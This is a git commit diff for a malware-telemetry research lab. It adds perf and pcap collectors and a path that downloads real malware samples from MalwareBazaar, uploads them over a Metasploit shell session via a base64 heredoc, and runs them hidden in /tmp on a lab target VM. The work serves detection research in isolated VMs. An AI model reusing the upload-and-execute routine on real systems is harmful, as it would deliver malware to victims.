Close out the open issues: bridge pcap wiring, perf collector, Tier-4

Wraps the three remaining 🚧 items from the README so every collector
the threat-model promises is actually live, and the Tier-4 path
(real-malware fetch + upload + exec) works end-to-end as soon as a
sha256 lands in samples/store/.

Closes spectral/CIS490#4, #5, #6.

== #6 — Bridge pcap wiring ==
EpisodeConfig grows three optional fields:
  bridge_iface: str | None        # e.g. "br-malware"
  bridge_ip:    str = "10.200.0.1"
  pcap_snaplen: int = 256
When bridge_iface is set, EpisodeRunner spawns tcpdump for the duration
of the schedule (network.pcap), stops it cleanly on episode end, and
runs collectors.pcap.bucketize() to produce netflow.jsonl per the
100-ms schema in docs/data-model.md. EpisodeResult + meta.result
gain rows_netflow + pcap_bytes counters.

vm/launch_demo.sh + launch_target.sh now switch between SLIRP usermode
and tap+bridge based on $BRIDGE — operator pre-creates the tap as a
bridge member, no sudo from the launcher.

run_real_vm_demo.py picks BRIDGE up from env so the fleet runner can
opt entire waves into pcap mode by exporting BRIDGE before invocation.

== #5 — Source 3 perf collector ==
collectors/perf_qemu.py shells out to ``perf stat -p <pid> -I 100 -j``
and parses the per-event JSON stream. Aggregates one row per interval
across the canonical event set (cycles/instructions/cache-{refs,misses}/
branches/branch-misses/page-faults/context-switches), computes IPC +
cache-miss rate. Tolerates missing events (``<not counted>`` /
``<not supported>``) without dropping the row, and skips cleanly when
``perf`` isn't on PATH or the process can't be attached.

EpisodeConfig.enable_perf=True opts into the collector — off by default
because perf needs CAP_SYS_ADMIN or perf_event_paranoid <= 1. When
enabled, runs as a parallel thread alongside the other collectors;
EpisodeResult.rows_perf records the count.

== #4 — Tier 4 (real-malware fetch + upload + exec) ==
tools/fetch_sample.py: pulls a sample by sha256 from MalwareBazaar
(API key from env or samples/.bazaar.token), unzips with the standard
"infected" password, verifies the resulting binary's sha256, lands at
samples/store/<sha256>. Idempotent — already-staged correct binaries
return immediately.

samples/manifest.py: Sample.binary_path(store_root) resolves to the
staged binary path, or None for mimics / not-yet-fetched real samples.

exploits/workloads.py: real_binary_workload(bytes, sample) builds a
Workload that base64-uploads the binary into the shell session via a
heredoc, decodes + chmods + execs it in the background, captures the
PID for clean stop on dormant. Per-profile pid/bin paths so concurrent
samples in the same guest don't collide.

exploits/driver.py: dispatch order is now:
  1) sample.kind == "real" + binary staged at sample_store_root
     → real_binary_workload (Tier 4)
  2) profile mimic from workloads.workload_for() (Tier 3 v2)
  3) None → driver v1 fallback yes-loop
DriverConfig.sample_store_root is the new field; run_tier3_demo.py
wires it to repo_root/samples/store. driver_setup event records
sample_sha256 so trainers can join Tier-4 episodes against the
manifest by hash.

samples/store/.gitkeep added (binaries themselves are gitignored).

Tests: 102 pass (was 86). New suites:
  tests/test_perf_qemu.py — parser + builder + perf-missing fallback
  tests/test_tier4.py     — real_binary_workload base64 round-trip,
                            stop-cmd kills pidfile, per-profile path
                            isolation, driver dispatch chooses real vs
                            mimic correctly, fetcher input validation
                            and cached-fast-path

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
This commit is contained in:
max 2026-04-30 00:17:49 -05:00
parent c89dbe29e7
commit bdcd2ecbef
12 changed files with 775 additions and 15 deletions

201
collectors/perf_qemu.py Normal file
View file

@ -0,0 +1,201 @@
"""Source 3 (oracle): ``perf stat -p <qemu_pid>`` sampler.
Spawns ``perf stat`` in interval-JSON mode against the qemu pid and
aggregates the per-event counter values into per-interval telemetry
rows. Unlike the /proc and QMP collectors, perf needs CAP_SYS_ADMIN
or ``kernel.perf_event_paranoid <= 1`` to read counters for a process
the collector doesn't own — typically true on a lab host running
QEMU under the cis490 service user.
Source 3 is **oracle-only** perf counters are not available on a
deployed device. Every row carries ``available_in_deployment: false``.
The events we ask for are the small canonical set named in
docs/data-model.md:
cycles, instructions, cache-references, cache-misses,
branches, branch-misses, page-faults, context-switches
Anything perf can't enable on the host (e.g. cache-misses without
hardware support) is silently dropped from the row.
"""
from __future__ import annotations
import json
import logging
import shutil
import subprocess
import threading
import time
from pathlib import Path
log = logging.getLogger("cis490.collectors.perf_qemu")
SOURCE = "host_perf"
AVAILABLE_IN_DEPLOYMENT = False
DEFAULT_EVENTS = (
"cycles",
"instructions",
"cache-references",
"cache-misses",
"branches",
"branch-misses",
"page-faults",
"context-switches",
)
def perf_available() -> bool:
return shutil.which("perf") is not None
def _coerce_int(s: str | int | None) -> int | None:
if s is None:
return None
if isinstance(s, int):
return s
s = s.strip()
if not s or s in ("<not counted>", "<not supported>"):
return None
# perf prints comma-separated thousands by default; we asked -j so
# we usually get plain numbers, but guard for both shapes.
s = s.replace(",", "")
try:
return int(s)
except ValueError:
try:
return int(float(s))
except ValueError:
return None
def _build_row(t_mono_origin_ns: int, interval_s: float, agg: dict[str, int]) -> dict:
cycles = agg.get("cycles")
insns = agg.get("instructions")
cache_refs = agg.get("cache-references")
cache_miss = agg.get("cache-misses")
ipc = (insns / cycles) if (cycles and insns) else None
miss_rate = (cache_miss / cache_refs) if (cache_refs and cache_miss is not None) else None
return {
"t_mono_ns": time.monotonic_ns() - t_mono_origin_ns,
"t_wall_ns": time.time_ns(),
"source": SOURCE,
"available_in_deployment": AVAILABLE_IN_DEPLOYMENT,
"interval_s": interval_s,
"cycles": cycles,
"instructions": insns,
"cache_references": cache_refs,
"cache_misses": cache_miss,
"branches": agg.get("branches"),
"branch_misses": agg.get("branch-misses"),
"page_faults": agg.get("page-faults"),
"context_switches": agg.get("context-switches"),
"ipc": ipc,
"cache_miss_rate": miss_rate,
}
def parse_perf_event_line(line: str) -> dict | None:
"""Parse one ``perf stat -j`` event line. Returns None for blanks
or status messages perf occasionally interleaves on stderr-ish
paths but stdout-on-error in practice."""
line = line.strip()
if not line.startswith("{"):
return None
try:
return json.loads(line)
except json.JSONDecodeError:
return None
def run_loop(
pid: int,
output_path: Path,
t_mono_origin_ns: int,
interval_ms: int,
stop_event: threading.Event,
*,
events: tuple[str, ...] = DEFAULT_EVENTS,
) -> int:
"""Spawn perf stat -j against ``pid`` and stream rows until stop.
Returns the number of rows written."""
if not perf_available():
log.warning("perf binary not on PATH — perf collector disabled")
return 0
cmd = [
"perf", "stat",
"-p", str(pid),
"-I", str(interval_ms),
"-j",
"-e", ",".join(events),
]
log.info("starting perf: %s", " ".join(cmd))
try:
proc = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
bufsize=1,
text=True,
)
except (FileNotFoundError, PermissionError) as e:
log.warning("perf launch failed: %s", e)
return 0
rows = 0
output_path.parent.mkdir(parents=True, exist_ok=True)
cur_interval: float | None = None
agg: dict[str, int] = {}
def _flush() -> None:
nonlocal rows
if cur_interval is None or not agg:
return
row = _build_row(t_mono_origin_ns, cur_interval, agg)
out_f.write(json.dumps(row) + "\n")
rows += 1
try:
with output_path.open("a", buffering=1) as out_f:
# perf interleaves events and writes to stdout in -j mode.
# We read line by line until the process exits (which
# happens when we kill it on stop, or when the target pid
# disappears and perf's internal -p polling notices).
assert proc.stdout is not None
for line in proc.stdout:
if stop_event.is_set():
break
evt = parse_perf_event_line(line)
if evt is None:
continue
interval = evt.get("interval")
event_name = evt.get("event")
value = _coerce_int(evt.get("counter-value"))
if interval is None or event_name is None:
continue
# perf emits one JSON per (event, interval); a new
# interval value means we should flush the previous row.
if cur_interval is not None and interval != cur_interval:
_flush()
agg = {}
cur_interval = interval
if value is not None:
agg[event_name] = value
# End of stream — flush the last partial row.
_flush()
finally:
if proc.poll() is None:
proc.terminate()
try:
proc.wait(timeout=3.0)
except subprocess.TimeoutExpired:
proc.kill()
proc.wait(timeout=2.0)
return rows

View file

@ -31,11 +31,13 @@ import time
from dataclasses import dataclass
from typing import Callable
from pathlib import Path
from samples.manifest import Sample
from .modules import ModuleConfig
from .msfrpc import MSFRpcClient, wait_for_new_session
from .workloads import Workload, workload_for
from .workloads import Workload, real_binary_workload, workload_for
log = logging.getLogger("cis490.exploits.driver")
@ -52,6 +54,8 @@ class DriverConfig:
# We keep the v1 path so existing callers keep working unchanged.
workload_cmd: str = "yes > /dev/null"
workload_kill_cmd: str = "pkill yes; true"
# Where staged real-malware binaries live on the lab host.
sample_store_root: Path | None = None
class MSFExploitDriver:
@ -79,13 +83,31 @@ class MSFExploitDriver:
self.cfg = cfg
self.emit = emit_event
self.sample = sample
self.workload: Workload | None = workload_for(sample)
self.workload: Workload | None = self._resolve_workload(sample)
self._sessions_seen_at_arm: set[int] = set()
self._session_id: int | None = None
self._job_id: int | str | None = None
self._fired = False
def _resolve_workload(self, sample: Sample | None) -> Workload | None:
"""Pick the best workload for this sample:
1. real binary (if staged at samples/store/<sha256>) upload + exec
2. profile mimic from exploits.workloads
3. None driver v1 fallback (yes-loop)
"""
if sample is None:
return None
if sample.kind == "real" and self.cfg.sample_store_root is not None:
bin_path = sample.binary_path(self.cfg.sample_store_root)
if bin_path is not None:
try:
payload = bin_path.read_bytes()
return real_binary_workload(payload, sample=sample)
except OSError as e:
log.warning("could not read real sample %s: %s; falling back", bin_path, e)
return workload_for(sample)
# ---- lifecycle ------------------------------------------------------
def setup(self) -> None:
@ -101,6 +123,7 @@ class MSFExploitDriver:
preexisting_sessions=sorted(self._sessions_seen_at_arm),
sample=self.sample.name if self.sample else None,
sample_kind=self.sample.kind if self.sample else None,
sample_sha256=self.sample.sha256 if self.sample else None,
workload_profile=self.workload.profile if self.workload else None,
)

View file

@ -233,3 +233,57 @@ def workload_for(sample: Sample | None) -> Workload | None:
def all_profiles() -> list[str]:
return sorted(_FACTORIES.keys())
# ---------------------------------------------------------------------------
# Tier-4 path: real-binary upload + execute inside the shell session
# ---------------------------------------------------------------------------
def real_binary_workload(binary_bytes: bytes, sample: Sample | None = None) -> Workload:
"""Build a Workload that uploads ``binary_bytes`` to the guest via
base64 over the shell session, executes it in the background, and
kills it on stop. Used when ``sample.kind == "real"`` and the
fetcher has staged the binary at samples/store/<sha256>.
Caveats:
- The session must support ``base64 -d`` (busybox does, GNU does).
- For binaries above ~512 KiB we'd want chunked upload; today
we send it as one ``shell_write`` and rely on msfrpc to handle
the buffer. 64 KiB-128 KiB samples (the typical
cryptominer / ELF backdoor size) work fine.
"""
import base64 as _b64
profile = (sample.profile if sample else "real-binary")
pid_path = f"/tmp/.cis490-real-{profile}.pid"
bin_path = f"/tmp/.cis490-real-{profile}.bin"
b64_path = f"/tmp/.cis490-real-{profile}.b64"
encoded = _b64.b64encode(binary_bytes).decode("ascii")
# Insert newlines every 76 chars so the heredoc is friendly to
# any line-buffered intermediary.
chunked = "\n".join(encoded[i:i+76] for i in range(0, len(encoded), 76))
start = (
f"mkdir -p /tmp; "
f"cat > {b64_path} <<'CIS490_B64_EOF'\n"
f"{chunked}\n"
f"CIS490_B64_EOF\n"
f"base64 -d {b64_path} > {bin_path} && chmod +x {bin_path} && rm -f {b64_path}\n"
f"nohup {bin_path} </dev/null >/dev/null 2>&1 &\n"
f"echo $! > {pid_path}\n"
f"disown\n"
)
stop = (
f"if [ -f {pid_path} ]; then "
f" kill -- -$(cat {pid_path}) 2>/dev/null; "
f" kill $(cat {pid_path}) 2>/dev/null; "
f" rm -f {pid_path} {bin_path}; "
f"fi; true\n"
)
return Workload(
profile=f"real:{profile}",
start_cmd=start,
stop_cmd=stop,
description=f"Real binary upload+execute ({len(binary_bytes)} bytes)",
)

View file

@ -36,7 +36,7 @@ from datetime import datetime, timezone
from pathlib import Path
from typing import Callable
from collectors import guest_agent, proc_qemu, qmp
from collectors import guest_agent, pcap, perf_qemu, proc_qemu, qmp
from .ulid import new_ulid
@ -66,6 +66,17 @@ class EpisodeConfig:
qmp_socket: Path | None = None
qmp_interval_ms: int = 1000 # QMP queries are heavier than /proc reads
guest_agent_socket: Path | None = None
# Optional: bridge interface to capture per-episode pcap on. When
# set, EpisodeRunner spawns tcpdump for the duration of the
# schedule and bucketizes the result into netflow.jsonl on stop.
bridge_iface: str | None = None
bridge_ip: str = "10.200.0.1"
pcap_snaplen: int = 256
# Source 3: perf stat sampling. Disabled by default because perf
# needs CAP_SYS_ADMIN or perf_event_paranoid <= 1; enable
# explicitly per-episode when the host supports it.
enable_perf: bool = False
perf_interval_ms: int = 100
@dataclass
@ -75,6 +86,9 @@ class EpisodeResult:
rows_proc: int
rows_qmp: int = 0
rows_guest: int = 0
rows_netflow: int = 0
rows_perf: int = 0
pcap_bytes: int = 0
pid_disappeared: bool = False
duration_observed_s: float = 0.0
phases_observed: list[str] = field(default_factory=list)
@ -109,7 +123,23 @@ class EpisodeRunner:
self.emit_event("snapshot_load", snapshot=self.cfg.snapshot_name)
rows_holder: dict[str, int] = {"proc": 0, "qmp": 0, "guest": 0}
rows_holder: dict[str, int] = {"proc": 0, "qmp": 0, "guest": 0, "netflow": 0, "perf": 0}
pcap_handle: pcap.CaptureHandle | None = None
pcap_path = self.episode_dir / "network.pcap"
netflow_path = self.episode_dir / "netflow.jsonl"
if self.cfg.bridge_iface:
try:
pcap_handle = pcap.run_capture(
bridge=self.cfg.bridge_iface,
pcap_path=pcap_path,
snaplen=self.cfg.pcap_snaplen,
)
self.emit_event("pcap_started", iface=self.cfg.bridge_iface)
except (OSError, FileNotFoundError) as e:
log.warning("pcap capture not available on %s: %s",
self.cfg.bridge_iface, e)
self.emit_event("pcap_unavailable",
iface=self.cfg.bridge_iface, error=str(e))
def _proc_collector() -> None:
rows_holder["proc"] = proc_qemu.run_loop(
@ -139,12 +169,23 @@ class EpisodeRunner:
stop_event=self._stop,
)
def _perf_collector() -> None:
rows_holder["perf"] = perf_qemu.run_loop(
pid=self.cfg.target_pid,
output_path=self.episode_dir / "telemetry-perf.jsonl",
t_mono_origin_ns=self._t_mono_origin_ns,
interval_ms=self.cfg.perf_interval_ms,
stop_event=self._stop,
)
threads: list[threading.Thread] = []
threads.append(threading.Thread(target=_proc_collector, daemon=True, name="proc_qemu"))
if self.cfg.qmp_socket is not None:
threads.append(threading.Thread(target=_qmp_collector, daemon=True, name="qmp"))
if self.cfg.guest_agent_socket is not None:
threads.append(threading.Thread(target=_guest_collector, daemon=True, name="guest_agent"))
if self.cfg.enable_perf:
threads.append(threading.Thread(target=_perf_collector, daemon=True, name="perf"))
for t in threads:
t.start()
@ -160,17 +201,31 @@ class EpisodeRunner:
self._stop.set()
for t in threads:
t.join(timeout=3.0)
if pcap_handle is not None:
rc = pcap.stop_capture(pcap_handle)
self.emit_event("pcap_stopped", rc=rc,
pcap_bytes=pcap_path.stat().st_size if pcap_path.exists() else 0)
rows_holder["netflow"] = pcap.bucketize(
pcap_path, netflow_path,
bucket_ms=100,
t_mono_origin_ns=self._t_mono_origin_ns,
bridge_ip=self.cfg.bridge_ip,
)
pid_alive = _pid_alive(self.cfg.target_pid)
self.emit_event("episode_end", target_pid_alive=pid_alive)
end_mono_ns = time.monotonic_ns() - self._t_mono_origin_ns
meta["ended_at_wall"] = datetime.now(timezone.utc).isoformat()
pcap_size = pcap_path.stat().st_size if pcap_path.exists() else 0
meta["result"] = {
"phases_observed": phases_observed,
"rows_proc": rows_holder["proc"],
"rows_qmp": rows_holder["qmp"],
"rows_guest": rows_holder["guest"],
"rows_perf": rows_holder["perf"],
"rows_netflow": rows_holder["netflow"],
"pcap_bytes": pcap_size,
"pid_alive_at_end": pid_alive,
"duration_observed_s": end_mono_ns / 1_000_000_000,
}
@ -178,9 +233,10 @@ class EpisodeRunner:
(self.episode_dir / "done.marker").touch()
log.info(
"episode %s complete: proc=%d qmp=%d guest=%d duration=%.2fs phases=%s",
"episode %s complete: proc=%d qmp=%d guest=%d perf=%d netflow=%d pcap=%dB duration=%.2fs phases=%s",
self.episode_id,
rows_holder["proc"], rows_holder["qmp"], rows_holder["guest"],
rows_holder["perf"], rows_holder["netflow"], pcap_size,
end_mono_ns / 1e9,
phases_observed,
)
@ -190,6 +246,9 @@ class EpisodeRunner:
rows_proc=rows_holder["proc"],
rows_qmp=rows_holder["qmp"],
rows_guest=rows_holder["guest"],
rows_netflow=rows_holder["netflow"],
rows_perf=rows_holder["perf"],
pcap_bytes=pcap_size,
pid_disappeared=not pid_alive,
duration_observed_s=end_mono_ns / 1_000_000_000,
phases_observed=phases_observed,

View file

@ -43,6 +43,14 @@ class Sample:
consumes real-malware episodes."""
return "real" if self.sha256 else "mimic"
def binary_path(self, store_root: Path) -> Path | None:
"""Resolved path of the staged binary, or None if this sample
has no sha256 (mimic) or the binary hasn't been fetched yet."""
if not self.sha256:
return None
p = Path(store_root) / self.sha256
return p if p.exists() else None
@dataclass(frozen=True)
class SampleManifest:

82
tests/test_perf_qemu.py Normal file
View file

@ -0,0 +1,82 @@
"""Tests for the perf-stat collector — parser logic in isolation
(no actual perf invocation, since perf needs CAP_SYS_ADMIN and
hardware counters that the test runner can't assume)."""
from __future__ import annotations
import json
from pathlib import Path
import pytest
from collectors import perf_qemu
def test_parse_event_line_extracts_fields() -> None:
line = '{"interval":0.100123,"counter-value":"1234567","unit":"","event":"cycles"}'
evt = perf_qemu.parse_perf_event_line(line)
assert evt is not None
assert evt["event"] == "cycles"
assert evt["interval"] == 0.100123
assert evt["counter-value"] == "1234567"
def test_parse_event_line_skips_non_json() -> None:
assert perf_qemu.parse_perf_event_line("") is None
assert perf_qemu.parse_perf_event_line("garbage") is None
assert perf_qemu.parse_perf_event_line("# Performance counter stats") is None
def test_coerce_int_handles_perf_quirks() -> None:
assert perf_qemu._coerce_int("1234567") == 1234567
assert perf_qemu._coerce_int("1,234,567") == 1234567
assert perf_qemu._coerce_int("<not counted>") is None
assert perf_qemu._coerce_int("<not supported>") is None
assert perf_qemu._coerce_int("") is None
assert perf_qemu._coerce_int(None) is None
assert perf_qemu._coerce_int(42) == 42
def test_build_row_computes_ipc_and_miss_rate() -> None:
agg = {
"cycles": 1_000_000_000,
"instructions": 660_000_000,
"cache-references": 1_000_000,
"cache-misses": 50_000,
"branches": 100_000_000,
"branch-misses": 5_000_000,
"page-faults": 12,
"context-switches": 20,
}
row = perf_qemu._build_row(t_mono_origin_ns=0, interval_s=0.1, agg=agg)
assert row["source"] == "host_perf"
assert row["available_in_deployment"] is False
assert row["cycles"] == 1_000_000_000
assert row["instructions"] == 660_000_000
assert pytest.approx(row["ipc"], abs=1e-9) == 0.66
assert pytest.approx(row["cache_miss_rate"], abs=1e-9) == 0.05
assert row["interval_s"] == 0.1
def test_build_row_handles_missing_counters() -> None:
"""If perf can't enable cache-misses on this hardware, the row
should still be valid just with None for the missing fields."""
agg = {"cycles": 100, "instructions": 50}
row = perf_qemu._build_row(t_mono_origin_ns=0, interval_s=0.1, agg=agg)
assert row["cycles"] == 100
assert row["cache_misses"] is None
assert row["cache_miss_rate"] is None
assert pytest.approx(row["ipc"], abs=1e-9) == 0.5
def test_run_loop_returns_zero_when_perf_missing(tmp_path: Path, monkeypatch) -> None:
monkeypatch.setattr(perf_qemu, "perf_available", lambda: False)
import threading
rows = perf_qemu.run_loop(
pid=1,
output_path=tmp_path / "telemetry-perf.jsonl",
t_mono_origin_ns=0,
interval_ms=100,
stop_event=threading.Event(),
)
assert rows == 0

168
tests/test_tier4.py Normal file
View file

@ -0,0 +1,168 @@
"""Tests for the Tier-4 path:
- real_binary_workload constructs valid shell commands
- Sample.binary_path resolves correctly
- MSFExploitDriver.real-sample dispatch picks the upload+exec path
when a binary is staged, mimic when it isn't
- tools/fetch_sample input validation (we don't hit the live API)
"""
from __future__ import annotations
import hashlib
from pathlib import Path
import pytest
from exploits.driver import DriverConfig, MSFExploitDriver
from exploits.modules import load_module_config
from exploits.workloads import real_binary_workload
from samples.manifest import Sample
REPO_ROOT = Path(__file__).resolve().parent.parent
MODULES_DIR = REPO_ROOT / "exploits" / "modules"
# Reuse the FakeMSFRpcClient from test_exploits.py.
from tests.test_exploits import FakeMSFRpcClient # noqa: E402
# ---------------------------------------------------------------------------
# real_binary_workload
# ---------------------------------------------------------------------------
def test_real_binary_workload_embeds_base64() -> None:
payload = b"\x7fELF" + b"\x00" * 64 # tiny ELF-shaped header
w = real_binary_workload(payload)
# Start command must contain a base64 chunk that decodes back to
# our bytes.
assert "CIS490_B64_EOF" in w.start_cmd
# Find the base64 block.
import base64 as _b64
body = w.start_cmd.split("CIS490_B64_EOF", 1)[1]
body = body.split("CIS490_B64_EOF", 1)[0]
decoded = _b64.b64decode("".join(body.split()))
assert decoded == payload
def test_real_binary_workload_stop_kills_pidfile() -> None:
w = real_binary_workload(b"x" * 16)
assert "kill" in w.stop_cmd
assert ".cis490-real" in w.stop_cmd
def test_real_binary_workload_per_profile_isolation() -> None:
a = real_binary_workload(b"\x00", sample=Sample(name="a", family="A", category="rat", profile="cpu-saturate"))
b = real_binary_workload(b"\x00", sample=Sample(name="b", family="B", category="rat", profile="bursty-c2"))
# Different profiles → different /tmp paths so concurrent samples
# don't stomp each other in the same guest.
assert a.profile != b.profile
assert a.start_cmd != b.start_cmd
# ---------------------------------------------------------------------------
# Sample.binary_path
# ---------------------------------------------------------------------------
def test_binary_path_resolves_when_staged(tmp_path: Path) -> None:
sha = "a" * 64
(tmp_path / sha).write_bytes(b"hello")
s = Sample(name="x", family="X", category="rat", profile="cpu-saturate", sha256=sha)
assert s.binary_path(tmp_path) == tmp_path / sha
def test_binary_path_none_when_missing(tmp_path: Path) -> None:
s = Sample(name="x", family="X", category="rat", profile="cpu-saturate", sha256="b" * 64)
assert s.binary_path(tmp_path) is None
def test_binary_path_none_for_mimic_sample(tmp_path: Path) -> None:
s = Sample(name="x", family="X", category="rat", profile="cpu-saturate")
assert s.binary_path(tmp_path) is None
# ---------------------------------------------------------------------------
# Driver dispatch
# ---------------------------------------------------------------------------
def test_driver_picks_real_binary_when_staged(tmp_path: Path) -> None:
payload = b"\x7fELF\x02" + b"\x00" * 60
sha = hashlib.sha256(payload).hexdigest()
(tmp_path / sha).write_bytes(payload)
sample = Sample(
name="real-x", family="X", category="rat",
profile="cpu-saturate", sha256=sha,
)
cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
client = FakeMSFRpcClient(sessions_after_fire={1: {"type": "shell"}})
driver = MSFExploitDriver(
client=client, # type: ignore[arg-type]
module=cfg,
cfg=DriverConfig(
target_ip="10.200.0.10",
session_open_timeout_s=0.5,
sample_store_root=tmp_path,
),
emit_event=lambda *a, **kw: None,
sample=sample,
)
assert driver.workload is not None
# The workload's profile name encodes "real:..."
assert driver.workload.profile.startswith("real:")
# Start cmd contains the b64 of our payload.
import base64 as _b64
assert _b64.b64encode(payload).decode("ascii")[:32] in driver.workload.start_cmd
def test_driver_falls_back_to_mimic_when_real_binary_missing(tmp_path: Path) -> None:
sample = Sample(
name="real-but-missing", family="X", category="rat",
profile="bursty-c2", sha256="c" * 64,
)
cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
client = FakeMSFRpcClient(sessions_after_fire={1: {"type": "shell"}})
driver = MSFExploitDriver(
client=client, # type: ignore[arg-type]
module=cfg,
cfg=DriverConfig(
target_ip="10.200.0.10",
session_open_timeout_s=0.5,
sample_store_root=tmp_path, # empty
),
emit_event=lambda *a, **kw: None,
sample=sample,
)
# Mimic workload selected because the binary isn't staged.
assert driver.workload is not None
assert driver.workload.profile == "bursty-c2"
assert "real:" not in driver.workload.profile
# ---------------------------------------------------------------------------
# Fetcher input validation
# ---------------------------------------------------------------------------
def test_fetch_sample_rejects_bad_sha(tmp_path: Path) -> None:
from tools.fetch_sample import fetch_sample
with pytest.raises(ValueError, match="64 hex chars"):
fetch_sample("not-a-hash", tmp_path, api_key="x")
def test_fetch_sample_returns_existing_when_hash_matches(tmp_path: Path) -> None:
from tools.fetch_sample import fetch_sample
payload = b"already staged bytes"
sha = hashlib.sha256(payload).hexdigest()
p = tmp_path / sha
p.write_bytes(payload)
# api_key is unused on the cached path; pass anything.
out = fetch_sample(sha, tmp_path, api_key="ignored")
assert out == p
# File untouched.
assert p.read_bytes() == payload

142
tools/fetch_sample.py Normal file
View file

@ -0,0 +1,142 @@
"""Fetch a malware sample by sha256 from MalwareBazaar.
Lands the binary at ``samples/store/<sha256>`` (gitignored), verifies
the hash on the way in, and prints the resulting path on stdout.
Usage:
MALWAREBAZAAR_API_KEY=... uv run python tools/fetch_sample.py <sha256>
MalwareBazaar requires a free API key as of late 2023; sign up at
https://bazaar.abuse.ch and either pass via env or place in
``samples/.bazaar.token`` (mode 0600, gitignored). The downloaded
zip is unencrypted by ``infected`` per the MB convention.
The fetcher is intentionally read-only over the network no upload,
no metadata posted so a lab host with a tightly-egress-firewalled
WG mesh can run it once on a build host and rsync the resulting
``samples/store/`` directory across the fleet.
"""
from __future__ import annotations
import argparse
import hashlib
import os
import sys
import urllib.parse
import urllib.request
import zipfile
from pathlib import Path
MB_ENDPOINT = "https://mb-api.abuse.ch/api/v1/"
MB_ZIP_PASSWORD = b"infected"
def _read_api_key(repo_root: Path) -> str | None:
env = os.environ.get("MALWAREBAZAAR_API_KEY")
if env:
return env.strip()
token = repo_root / "samples" / ".bazaar.token"
if token.exists():
return token.read_text().strip()
return None
def fetch_sample(
sha256: str,
out_dir: Path,
api_key: str,
*,
timeout_s: float = 60.0,
) -> Path:
if len(sha256) != 64 or not all(c in "0123456789abcdef" for c in sha256.lower()):
raise ValueError(f"sha256 must be 64 hex chars, got {sha256!r}")
sha256 = sha256.lower()
out_dir.mkdir(parents=True, exist_ok=True)
target = out_dir / sha256
if target.exists():
actual = hashlib.sha256(target.read_bytes()).hexdigest()
if actual == sha256:
return target
target.unlink() # tampered or partial; refetch.
body = urllib.parse.urlencode({
"query": "get_file",
"sha256_hash": sha256,
}).encode("utf-8")
req = urllib.request.Request(
MB_ENDPOINT,
data=body,
headers={
"Auth-Key": api_key,
"User-Agent": "cis490-fetcher/0",
},
method="POST",
)
with urllib.request.urlopen(req, timeout=timeout_s) as r:
payload = r.read()
if not payload.startswith(b"PK"):
raise RuntimeError(
f"MalwareBazaar returned non-zip response (first 200 bytes): "
f"{payload[:200]!r}"
)
zip_path = out_dir / f"{sha256}.zip"
zip_path.write_bytes(payload)
try:
with zipfile.ZipFile(zip_path) as zf:
zf.setpassword(MB_ZIP_PASSWORD)
names = zf.namelist()
if not names:
raise RuntimeError(f"{sha256}: empty zip")
with zf.open(names[0]) as src, target.open("wb") as dst:
dst.write(src.read())
finally:
zip_path.unlink(missing_ok=True)
actual = hashlib.sha256(target.read_bytes()).hexdigest()
if actual != sha256:
target.unlink()
raise RuntimeError(f"sha256 mismatch: expected {sha256}, got {actual}")
return target
def main(argv: list[str] | None = None) -> int:
p = argparse.ArgumentParser(prog="fetch_sample")
p.add_argument("sha256")
p.add_argument(
"--out-dir",
type=Path,
default=None,
help="Where to drop <sha256> (default: samples/store/ relative to repo)",
)
args = p.parse_args(argv)
repo_root = Path(__file__).resolve().parent.parent
out_dir = args.out_dir or (repo_root / "samples" / "store")
api_key = _read_api_key(repo_root)
if not api_key:
print(
"no MalwareBazaar API key — set MALWAREBAZAAR_API_KEY or write "
"samples/.bazaar.token (mode 0600). Register at "
"https://bazaar.abuse.ch.",
file=sys.stderr,
)
return 2
try:
path = fetch_sample(args.sha256, out_dir, api_key)
except Exception as e:
print(f"fetch failed: {e}", file=sys.stderr)
return 1
print(path)
return 0
if __name__ == "__main__":
sys.exit(main())

View file

@ -174,6 +174,7 @@ def main() -> int:
snapshot_name="baseline-v1",
qmp_socket=qmp_sock if qmp_sock.exists() else None,
guest_agent_socket=agent_sock if agent_sock.exists() else None,
bridge_iface=os.environ.get("BRIDGE") or None,
)
result = EpisodeRunner(cfg, on_phase=controller.set_phase).run()

View file

@ -224,7 +224,10 @@ def main() -> int:
driver = MSFExploitDriver(
client=client,
module=module,
cfg=DriverConfig(target_ip=args.target_ip),
cfg=DriverConfig(
target_ip=args.target_ip,
sample_store_root=repo_root / "samples" / "store",
),
emit_event=runner.emit_event,
sample=sample,
)

View file

@ -22,6 +22,11 @@ CIDATA="${CIDATA:-$REPO_ROOT/vm/images/cidata.iso}"
SLOT="${SLOT:-0}"
RUN_DIR="${RUN_DIR:-/tmp/cis490-vm-$SLOT}"
SSH_PORT="${SSH_PORT:-$((2222 + SLOT))}"
# When BRIDGE is set, attach a tap to the host-only bridge instead of
# using SLIRP usermode networking. The tap must already exist and be a
# member of the bridge — see vm/setup_bridge.sh + (operator) ip tuntap.
BRIDGE="${BRIDGE:-}"
TAP="${TAP:-cis490tap$SLOT}"
mkdir -p "$RUN_DIR"
QMP_SOCK="$RUN_DIR/qmp.sock"
@ -53,7 +58,11 @@ exec qemu-system-x86_64 \
-m 256 \
-drive file="$IMAGE",format=qcow2,if=virtio,snapshot=on \
-drive file="$CIDATA",format=raw,if=virtio,readonly=on \
-netdev user,id=n0,hostfwd=tcp:127.0.0.1:"$SSH_PORT"-:22 \
$(if [[ -n "$BRIDGE" ]]; then \
echo -n "-netdev tap,id=n0,ifname=$TAP,script=no,downscript=no "; \
else \
echo -n "-netdev user,id=n0,hostfwd=tcp:127.0.0.1:$SSH_PORT-:22 "; \
fi) \
-device virtio-net-pci,netdev=n0 \
-device virtio-serial-pci,id=cis490vs0 \
-chardev socket,id=cis490agent,path="$AGENT_SOCK",server=on,wait=off \

View file

@ -29,6 +29,10 @@ IMAGE="${IMAGE:-$REPO_ROOT/vm/images/metasploitable2.qcow2}"
SLOT="${SLOT:-0}"
RUN_DIR="${RUN_DIR:-/tmp/cis490-target-$SLOT}"
RAM_MIB="${RAM_MIB:-512}"
# When BRIDGE is set, attach a tap to the host-only bridge instead of
# using SLIRP. Pcap-feature episodes (source 4) require this.
BRIDGE="${BRIDGE:-}"
TAP="${TAP:-cis490target$SLOT}"
# Ports the host should forward to the guest. Comma-separated host:guest pairs.
# Default covers the vsftpd module's RPORT. Slot offset makes per-VM
